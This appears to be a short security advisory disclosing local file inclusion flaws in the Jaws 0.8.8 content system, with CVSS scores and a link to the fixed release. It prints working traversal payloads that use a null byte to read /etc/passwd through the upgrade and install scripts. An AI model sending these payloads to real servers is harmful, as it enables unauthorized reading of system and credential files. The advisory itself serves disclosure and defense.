Jaws 0.8.8 Multiple Local File Inclusion Vulnerabilities

2009.02.21
Credit: Anon
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2009-0645
CWE: CWE-22


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Jaws 0.8.8 Local File Inclusion POST /upgrade/index.php language=../../../../../../../../../../../../etc/passwd%00 POST /install/index.php language=../../../../../../../../../../../../etc/passwd%00 Also vulnerable: Introduction_complete use_log Author notified: Jan 24

References:

http://www.jaws-project.com/blog/show/jaws-089-released


See this note in RAW Version
Vote for this issue:
50%
50%

Comment it here.
Copyright 2025, cxsecurity.com

 

Back to Top